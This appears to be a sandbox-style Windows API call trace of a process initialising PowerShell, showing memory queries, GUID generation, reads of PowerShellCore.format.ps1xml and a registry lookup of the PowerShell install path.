	[0318.091] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.091] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] VirtualQuery (in: lpAddress=0x28b5c0, lpBuffer=0x28c480, dwLength=0x30 | out: lpBuffer=0x28c480*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.092] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xc188efd0, Data2=0x4b09, Data3=0x49e2, Data4=([0]=0xb5, [1]=0x36, [2]=0x4e, [3]=0x2b, [4]=0x3a, [5]=0x25, [6]=0x6d, [7]=0xeb))) returned 0x0
	[0318.093] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x31368175, Data2=0x27ce, Data3=0x4b9a, Data4=([0]=0xab, [1]=0x30, [2]=0x74, [3]=0xb6, [4]=0xa8, [5]=0x14, [6]=0xcd, [7]=0xd))) returned 0x0
	[0318.093] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x1101e528, Data2=0x150e, Data3=0x4a01, Data4=([0]=0x96, [1]=0x97, [2]=0x6a, [3]=0x25, [4]=0xd2, [5]=0x67, [6]=0xc8, [7]=0x79))) returned 0x0
	[0318.093] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe9907ae2, Data2=0x3923, Data3=0x45a5, Data4=([0]=0xb9, [1]=0x31, [2]=0xd4, [3]=0xc8, [4]=0xf8, [5]=0x57, [6]=0xf4, [7]=0xbe))) returned 0x0
	[0318.094] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x7b324437, Data2=0x931e, Data3=0x4926, Data4=([0]=0xa9, [1]=0x2e, [2]=0x4c, [3]=0x93, [4]=0x61, [5]=0x22, [6]=0xc3, [7]=0x23))) returned 0x0
	[0318.094] VirtualQuery (in: lpAddress=0x28b6d0, lpBuffer=0x28c590, dwLength=0x30 | out: lpBuffer=0x28c590*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.094] VirtualQuery (in: lpAddress=0x28b760, lpBuffer=0x28c620, dwLength=0x30 | out: lpBuffer=0x28c620*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.094] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x1dea1ea1, Data2=0x4e76, Data3=0x49c5, Data4=([0]=0x9a, [1]=0x9a, [2]=0xad, [3]=0x77, [4]=0x26, [5]=0xe8, [6]=0x4a, [7]=0x5e))) returned 0x0
	[0318.094] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xeddc040f, Data2=0x8852, Data3=0x4152, Data4=([0]=0x81, [1]=0x9f, [2]=0x13, [3]=0x4d, [4]=0x95, [5]=0xd5, [6]=0x51, [7]=0x10))) returned 0x0
	[0318.094] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x557f9ad2, Data2=0x618a, Data3=0x4c79, Data4=([0]=0xaf, [1]=0xf2, [2]=0x1e, [3]=0x92, [4]=0x6, [5]=0x41, [6]=0xe9, [7]=0x98))) returned 0x0
	[0318.095] SetErrorMode (uMode=0x1) returned 0x1
	[0318.095] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0318.095] SetErrorMode (uMode=0x1) returned 0x1
	[0318.095] GetFileType (hFile=0x304) returned 0x1
	[0318.095] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.096] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.096] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.096] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.096] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.096] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.096] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.097] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.097] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.097] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.097] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.097] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.097] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.098] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.098] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.098] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.098] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.099] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.099] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.099] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.099] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.099] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0xe67, lpOverlapped=0x0) returned 1
	[0318.099] ReadFile (in: hFile=0x304, lpBuffer=0x2f2f29f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2f29f*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.099] ReadFile (in: hFile=0x304, lpBuffer=0x2f2fcd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f2fcd0*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.099] SetErrorMode (uMode=0x1) returned 0x1
	[0318.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0318.100] SetErrorMode (uMode=0x1) returned 0x1
	[0318.100] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x304) returned 0x0
	[0318.100] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0318.100] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e4740
	[0318.100] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x1b7e4740, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0318.100] CoTaskMemFree (pv=0x1b7e4740) 
	[0318.100] RegCloseKey (hKey=0x304) returned 0x0
	[0318.101] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x988a5f08, Data2=0xda51, Data3=0x41e9, Data4=([0]=0xb1, [1]=0xd3, [2]=0x42, [3]=0x4f, [4]=0xc9, [5]=0x2e, [6]=0xf0, [7]=0x0))) returned 0x0
	[0318.101] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xbc6e0401, Data2=0xe5, Data3=0x4bd7, Data4=([0]=0x93, [1]=0x6a, [2]=0xbd, [3]=0xd5, [4]=0xc0, [5]=0x38, [6]=0x2c, [7]=0xf6))) returned 0x0
	[0318.101] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xeab3aac1, Data2=0xddb4, Data3=0x4b52, Data4=([0]=0xb1, [1]=0x90, [2]=0xc9, [3]=0xd2, [4]=0x6a, [5]=0xeb, [6]=0x94, [7]=0x16))) returned 0x0
	[0318.101] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x32bc0723, Data2=0x865d, Data3=0x48f8, Data4=([0]=0x8e, [1]=0x49, [2]=0xbd, [3]=0xd4, [4]=0x5e, [5]=0x24, [6]=0x8d, [7]=0xa3))) returned 0x0
	[0318.102] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xed2cc7a9, Data2=0xbad8, Data3=0x4779, Data4=([0]=0xa7, [1]=0x31, [2]=0x47, [3]=0xf7, [4]=0xa3, [5]=0xcd, [6]=0x2d, [7]=0x53))) returned 0x0
	[0318.102] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x3913e72, Data2=0xbe60, Data3=0x4a29, Data4=([0]=0x92, [1]=0xb5, [2]=0xc5, [3]=0xce, [4]=0x51, [5]=0xc5, [6]=0x20, [7]=0x7f))) returned 0x0
	[0318.102] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x4602a189, Data2=0x4a41, Data3=0x45a9, Data4=([0]=0x9f, [1]=0x37, [2]=0xc0, [3]=0x3c, [4]=0xe7, [5]=0xdd, [6]=0x7a, [7]=0xb9))) returned 0x0
	[0318.102] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.102] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x77132a69, Data2=0x65ba, Data3=0x4355, Data4=([0]=0xb1, [1]=0xf3, [2]=0xe3, [3]=0x85, [4]=0xa1, [5]=0x79, [6]=0xc9, [7]=0xa8))) returned 0x0
	[0318.102] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe7b3afdf, Data2=0x515e, Data3=0x4f02, Data4=([0]=0xba, [1]=0x53, [2]=0xc1, [3]=0xb, [4]=0xc8, [5]=0xfa, [6]=0xd, [7]=0x70))) returned 0x0
	[0318.102] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x1f2d4e4b, Data2=0x9a77, Data3=0x4295, Data4=([0]=0x8d, [1]=0x6c, [2]=0x4e, [3]=0xe3, [4]=0xc4, [5]=0x5a, [6]=0xc2, [7]=0xfc))) returned 0x0
	[0318.102] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x26662e58, Data2=0xaa4b, Data3=0x4bb7, Data4=([0]=0xac, [1]=0x1d, [2]=0x2b, [3]=0x6c, [4]=0x24, [5]=0x4e, [6]=0xf1, [7]=0x8f))) returned 0x0
	[0318.103] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xad3b8149, Data2=0x3f41, Data3=0x44ae, Data4=([0]=0xb4, [1]=0xc6, [2]=0xeb, [3]=0x8e, [4]=0x9b, [5]=0xf5, [6]=0xd2, [7]=0x22))) returned 0x0
	[0318.103] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x8019fdba, Data2=0x6824, Data3=0x4eb7, Data4=([0]=0xa8, [1]=0xc9, [2]=0xe7, [3]=0xec, [4]=0xad, [5]=0x8a, [6]=0xbc, [7]=0x9c))) returned 0x0
	[0318.103] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x1b198089, Data2=0x98b9, Data3=0x473a, Data4=([0]=0xba, [1]=0xe0, [2]=0x40, [3]=0x88, [4]=0x71, [5]=0x31, [6]=0x45, [7]=0x50))) returned 0x0
	[0318.103] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x49fbada3, Data2=0x1ec1, Data3=0x439c, Data4=([0]=0xbd, [1]=0x50, [2]=0x54, [3]=0x7, [4]=0xdd, [5]=0xb4, [6]=0xbf, [7]=0xda))) returned 0x0
	[0318.103] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xfe948020, Data2=0xfb8, Data3=0x4dd5, Data4=([0]=0x8b, [1]=0x2e, [2]=0x1, [3]=0x4b, [4]=0x8, [5]=0x3e, [6]=0x56, [7]=0x40))) returned 0x0
	[0318.103] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x78bff366, Data2=0x45c9, Data3=0x4721, Data4=([0]=0xb4, [1]=0xd4, [2]=0x29, [3]=0xb6, [4]=0x8c, [5]=0xb2, [6]=0x4a, [7]=0xcd))) returned 0x0
	[0318.103] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xcf8e3625, Data2=0xad81, Data3=0x422f, Data4=([0]=0xb8, [1]=0xe9, [2]=0xe7, [3]=0xc9, [4]=0x74, [5]=0x5, [6]=0x25, [7]=0xa8))) returned 0x0
	[0318.104] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x48c30322, Data2=0xddfd, Data3=0x4f9a, Data4=([0]=0x9b, [1]=0x5f, [2]=0xbe, [3]=0xcc, [4]=0x3d, [5]=0xb9, [6]=0xa7, [7]=0xe5))) returned 0x0
	[0318.104] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.104] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.104] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.104] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x48f760a2, Data2=0x850c, Data3=0x4f27, Data4=([0]=0xaf, [1]=0x44, [2]=0x76, [3]=0x2, [4]=0xfc, [5]=0x46, [6]=0xfe, [7]=0xee))) returned 0x0
	[0318.104] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xd87e6b0e, Data2=0x6bb7, Data3=0x405a, Data4=([0]=0x86, [1]=0xf5, [2]=0x95, [3]=0xbb, [4]=0x8c, [5]=0xda, [6]=0x73, [7]=0xc4))) returned 0x0
	[0318.104] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x44109dab, Data2=0xccad, Data3=0x4b26, Data4=([0]=0x99, [1]=0x8f, [2]=0xa7, [3]=0x1b, [4]=0x76, [5]=0x48, [6]=0xae, [7]=0x2a))) returned 0x0
	[0318.104] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x8445528a, Data2=0x1fe4, Data3=0x4e62, Data4=([0]=0xbe, [1]=0x4, [2]=0xf9, [3]=0xd, [4]=0x9e, [5]=0x25, [6]=0xed, [7]=0xbd))) returned 0x0
	[0318.105] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x8408e4b8, Data2=0x1e7a, Data3=0x49b7, Data4=([0]=0x8f, [1]=0x1c, [2]=0xec, [3]=0x4c, [4]=0xa7, [5]=0xcb, [6]=0x99, [7]=0xda))) returned 0x0
	[0318.105] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x82d5bd6f, Data2=0x8688, Data3=0x4d21, Data4=([0]=0xa9, [1]=0xea, [2]=0x59, [3]=0x22, [4]=0xd6, [5]=0xce, [6]=0x89, [7]=0x52))) returned 0x0
	[0318.401] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb55c50f4, Data2=0x34ed, Data3=0x472e, Data4=([0]=0x9b, [1]=0x55, [2]=0x35, [3]=0xd8, [4]=0x6d, [5]=0xda, [6]=0x94, [7]=0x14))) returned 0x0
	[0318.401] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xfb9c626e, Data2=0xfadb, Data3=0x494a, Data4=([0]=0xa8, [1]=0x6b, [2]=0xbf, [3]=0x2d, [4]=0x81, [5]=0x67, [6]=0x4, [7]=0xd3))) returned 0x0
	[0318.401] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe2a60f58, Data2=0xb072, Data3=0x4032, Data4=([0]=0x81, [1]=0x8, [2]=0x8f, [3]=0xb1, [4]=0x7d, [5]=0xd9, [6]=0x85, [7]=0x8f))) returned 0x0
	[0318.401] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xd6324fd, Data2=0x10c, Data3=0x4fc5, Data4=([0]=0xb3, [1]=0x86, [2]=0xb1, [3]=0xb2, [4]=0xf6, [5]=0xc3, [6]=0xe1, [7]=0x45))) returned 0x0
	[0318.401] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb1a3f6c7, Data2=0x9354, Data3=0x496e, Data4=([0]=0xa0, [1]=0x30, [2]=0xd3, [3]=0x6a, [4]=0xfe, [5]=0x2, [6]=0xcd, [7]=0xce))) returned 0x0
	[0318.402] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x795bd902, Data2=0x4af5, Data3=0x4dfe, Data4=([0]=0xbc, [1]=0x70, [2]=0xb3, [3]=0x46, [4]=0xe8, [5]=0x5, [6]=0xfb, [7]=0x76))) returned 0x0
	[0318.402] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb10f24f0, Data2=0x38da, Data3=0x413d, Data4=([0]=0xba, [1]=0xc0, [2]=0x17, [3]=0xd7, [4]=0x36, [5]=0xe3, [6]=0x7a, [7]=0x2a))) returned 0x0
	[0318.402] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.402] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x12604b1c, Data2=0x1692, Data3=0x43ba, Data4=([0]=0xaf, [1]=0xb, [2]=0xef, [3]=0x60, [4]=0x1a, [5]=0x77, [6]=0xbc, [7]=0xd0))) returned 0x0
	[0318.402] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.403] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.403] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe38cad25, Data2=0x9625, Data3=0x443c, Data4=([0]=0xa7, [1]=0x6a, [2]=0xb7, [3]=0xe7, [4]=0x21, [5]=0x96, [6]=0xc2, [7]=0x94))) returned 0x0
	[0318.403] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.403] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xa299bb44, Data2=0x68b1, Data3=0x4cb1, Data4=([0]=0x84, [1]=0xc7, [2]=0x98, [3]=0xe1, [4]=0xd4, [5]=0xd2, [6]=0x9, [7]=0x8c))) returned 0x0
